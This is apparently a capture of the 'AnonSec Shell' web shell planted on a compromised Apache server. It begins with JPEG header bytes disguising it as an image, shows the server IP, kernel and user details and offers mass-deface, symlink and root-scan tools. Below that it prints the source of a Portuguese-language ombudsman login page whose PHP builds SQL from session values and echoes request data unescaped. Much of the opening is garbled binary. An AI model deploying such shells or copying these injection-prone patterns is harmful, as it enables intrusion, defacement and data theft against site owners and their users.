JFIF  H H C nxxd C "     &    !1A2Q"aqBb    1   ? R{~ ,.Y| @sl_޸s[+6ϵG};?2Y`&9LP ?3rj  "@V]:3T -G*P ( *(@AEY]qqqALn +Wtu?)l QU T* Aj- x:˸T u53Vh @PS@ ,i,!"\hPw+E@ ηnu ڶh% (Lvũbb- ?M֍݌٥IHln㏷L(6 9L^"6P  d&1H&8@TUT CJ%eʹFTj4i5=0g J &Wc+3kU@PS@HH33M * "Uc(\`F+b{RxWGk ^#Uj*v' V ,FYKɠMckZٸ]ePP  d\A2glo=WL(6 ^;k"ucoH"b ,PDVlvL_/:̗rN\m dcw T-O$w+FZ5T *Y~l: 99U)8ZAt@GLX*@bijqW;MᎹ،O[5*5*@=qusݝ *EPx՝.~ YИ 3M3@E)GTg%Anp P MUҀhԳW c֦iZ ffR 7qMcyAZT c0bZU k+oG<] APQ T A={PDti@c>>KÚ"q L.1P k6QY7t.k7o  <P &yַܼJZy Wz{UrS @ ~P)Y:A"]Y&ScVO%17 6l4 i4YR5 ruk* ؼdZͨZZ cLakb3N6æ\1`XTloTuT AA 7Uq@2ŬzoʼnБRͪ&8}: e}0ZNΖJ*Ս9˪ޘtao]7$ 9EjS} qt" ( .=Y:V#'H: δ4#6yjѥBB ;WD-ElFf67*\AmAD Q __'2$ TX 9nu'm@iPDT qS`%u%3[nY,  :g = tiX H]ij"+6Z* .~|05s6 ,ǡ ogm+ KtE-BF  ES@(UJ xM~8%g/= Vw[Vh 3lJT  rK -kˎY ٰ  ,ukͱٵf sXDP  ]p]&MS95O+j &f6m463@ t8ЕX=6}HR 5ٶ06 /@嚵*6  " hP@eVDiYQT `7tLf4c?m//B4 laj  L} :E  b#PHQb, yN`rkAb^ |} s4XB4 * ,@[{Ru+%le2} `,kI$U` >OMuh  P % ʵ/ L\5aɕVN1R6 3}ZLj-Dl@ *( K\^i@F@551 k㫖h  Q沬#h XV +;]6z OsFpiX $OQ ) ųl4 YtK'(W AnonSec Shell
AnonSec Shell
Server IP : 20.75.53.88  /  Your IP : 216.73.217.165   [ Reverse IP ]
Web Server : Apache
System : Linux VMRALP-3 4.4.0-256-generic #290~14.04.1-Ubuntu SMP Thu Jun 20 09:24:50 UTC 2024 x86_64
User : www-data ( 33)
PHP Version : 5.5.9-1ubuntu4.29+esm15
Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,
Domains : 3 Domains
MySQL : ON  |  cURL : OFF  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /var/www/html/ouvidoria/dev/index/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME ]     [ BACKUP SHELL ]     [ JUMPING ]     [ MASS DEFACE ]     [ SCAN ROOT ]     [ SYMLINK ]     

Current File : /var/www/html/ouvidoria/dev/index/index.php
<?php
    //****G&T Controller***
    require_once("../inc/security.php");
    include("config.php");
    $entidade = execQuery('select * from sis_entidade');
    $empresa  = mysql_fetch_array($entidade);
    
    $login    = $_POST["login"];
    $password = $_POST["password"];
    $novocad  = $_GET['novocad'];
    $tipo     = $_REQUEST['t'];
    $uid      = getSession('uid');
    $msg      = "";
    
    $i   = execQuery("select * from lda_solicitante where idsolicitante=$uid");
    $img = mysql_fetch_array($i);
    
    if (usaRecaptcha($login))
        $usarecap = true;
    else
        $usarecap = false;
    
    
    if ($_POST['btsub']) {
        
        if ($usarecap) {
            $error        = null;
            $recaptcha_ok = (strtoupper($_POST["palavra"])==strtoupper($_SESSION["palavra"]));
        } else
            $recaptcha_ok = true;
        
        if ($recaptcha_ok) {
            if (autentica($login, $password, $tipo)) {
                if (getSession("confirmado")=="S")
                    //Redirect("../acompanhamento");
                    Redirect("../index");
                else {
                    Redirect("../reenvioconfirmacao");
                }
            } else {
                $msg      = "<font color='red'>Erro: falha no login.</font>";
                $usarecap = true;
            }
        } else
            $msg = "<font color='red'>Erro: falha no login.</font>";
    }
    include("../inc/topo.php");
?>
<!DOCTYPE html>
<html lang="pt-BR">
<div id="principal">
    <div class='col-md-8 col-xs-12' id='margin-bottom'>
        <div class='panel panel-primary filterable'>
            <div class="list-group-item active" align="center">Contate a Ouvidoria, a sua opinião é muito importante para nós</div>
            <div>
                <!-- inicio  -->
                <div class="col-md-2 col-xs-2 centro centralizado">
                    <div class="row">
                        <div class="col-md-4" align="center">

                            <p>&nbsp;</p>
                            <p>&nbsp;</p>
                            <img alt="logo central da aplicação" src="../img/imgouvidoria.png" class="img-rounded"/>
                        </div>
                    </div>
                </div>
                <div class="col-md-3 col-xs-12">
                    <div>
                        <div class="panel-heading">
                            <!--                                <section>-->
                            <!--                                </section>-->
                        </div>
                    </div>
                </div>
                <div class="col-md-6 col-xs-12">
                    <div>
                        <div class="panel-heading">
                            <!--                                <section>-->
                            <h4>Contatos</h4>
                            <span><strong><?=utf8_encode($empresa['entidade'])?></strong></span>
                            <li>
                                <span><i class="glyphicon glyphicon-phone-alt"></i>&nbsp;<?=$empresa['telefone']?></span>
                            </li>
                            <li>
                                <span><i class="glyphicon glyphicon-map-marker">&nbsp;</i><?=utf8_encode($empresa['endereco'])?></span>
                            </li>
                            <li>
                                    <span><i class="glyphicon glyphicon-envelope">&nbsp;</i><a class="link2" href="<?=$empresa['contato']?>" target="_blank">
                                            Contato</a></span>
                            </li>
                            <br>
                            <span><strong>G&T Controller | Suporte</strong></span>
                            <li>
                                <span><i class="glyphicon glyphicon-phone-alt">&nbsp;</i>(85) 3085-5002</span>
                            </li>
                            <li>
                                <span><i class="glyphicon glyphicon-map-marker">&nbsp;</i>Rua Eucalipto, 132 - Cajazeiras </span>
                            </li>
                            <li>
                                    <span><i class="glyphicon glyphicon-envelope">&nbsp;</i>
                                        <a class="link2" href="https://www.gtcontroller.com.br" target="_blank">Contato</a></span>
                            </li>
                            <!--                            </section>-->
                        </div>
                    </div>
                </div>
            </div>
        </div>
    </div>
    <?php if (empty($_SESSION[SISTEMA_CODIGO])) { ?>
    <div class='col-md-4 col-xs-12'>
        <div class='panel panel-primary filterable col-md-offset-0'>
            <div class=" list-group-item active " align='center'>ACESSO DO USUÁRIO AO SISTEMA</div>
            <div class='container panel-body'>
                <form action="index.php" method="post">
                    <div id="campos">

                        <div class="col-lg-12 col-xs-12">
                            <label for="loginUsu">Usuário: (Nº C.P.F.) </label>
                            <div>
                                <input alt="informe o CPF do usu�rio" class="form-control" value="<?=$novocad?>" autofocus type="text" name="login" id="loginUsu" maxlength="20">
                            </div>
                        </div>
                        <div class="col-lg-12 col-xs-12">
                            <label for="passwordUsu">Senha: </label>
                            <div>
                                <input class="form-control" type="password" name="password" id="passwordUsu" maxlength="100">
                            </div>
                        </div>
                        <?php if ($usarecap) { ?>
                            <div class="col-lg-12 col-xs-12">
                                <div>
                                    <br>
                                    <img src="../inc/captcha.php?l=150&a=50&tf=20&ql=5" id="imgcaptcha">
                                    <img src="../img/refresh.gif" title="Clique aqui para recarregar a imagem" alt="Clique aqui para recarregar a imagem" onclick="getElementById('imgcaptcha').src ='../inc/captcha.php?l=150&a=50&tf=20&ql=5';">
                                    <br><span class="">Informe o código acima:</span><br><input type="text" name="palavra"/>
                                </div>
                            </div>
                        <?php } ?>
                        <div class="col-lg-12 col-xs-12">
                            <br><br><input type="submit" class="form-control btn btn-primary" name="btsub" value="Entrar">
                        </div>
                        <br>

                        <div class="col-lg-12 col-xs-12 centro">
                            <a class="link" href="../cadastro" style="color: #d23e30;">Novo aqui? Efetue seu Cadastro</a>
                            <!-- <a class="link" href="../reset">Esqueci a senha</a>-->
                        </div>

                    </div>
                </form>
            </div>
        </div>
    </div>
</div>
<?php } else { ?>
    <div class='col-md-4 col-xs-12'>
        <div class='panel panel-primary filterable col-md-offset-0'>
            <div class=" list-group-item active " align='center'>LOGADO AO SISTEMA</div>
            <div class="centro panel-body col-xs-4">
                <?php if ($img['foto']=='') { ?>
                    <a href="foto.php?uid=<?php echo getSession("uid"); ?>" class="link"><img alt="adicionar foto" title="Adicionar foto" src="../img/logado.png" width="120px"/></a>
                <?php } else { ?>
                    <a href="foto.php?uid=<?php echo getSession("uid"); ?>" class="link"><img alt="alterar foto" title="Alterar foto" src="<?=$img['foto']?>" class="img img-rounded img-responsive"/></a>
                <?php } ?>
            </div>
            <div class='container panel-body col-xs-8'>
                <div class="notice notice-warning">Olá <strong><?php echo getSession("nomeusuario"); ?></strong>!</div>
                <div class="notice notice-info">
                    <br>
                    Seja bem vindo(a) ao sistema!
                    <br><br>
                    O que deseja fazer?<br><br>
                    <li><a class="link" href="../solicitacao">Incluir mensagem</a></li>
                    <li><a class="link" href="../acompanhamento">Mensagens enviadas</a></li>
                    <br>
                    Caso n�o seja voc� [<a href="../index/logout.php" class="link">clique aqui</a>]
                </div>
            </div>
        </div>
    </div>


<?php } ?>
<?php include("../inc/rodape.php"); ?>

Anon7 - 2022
AnonSec Team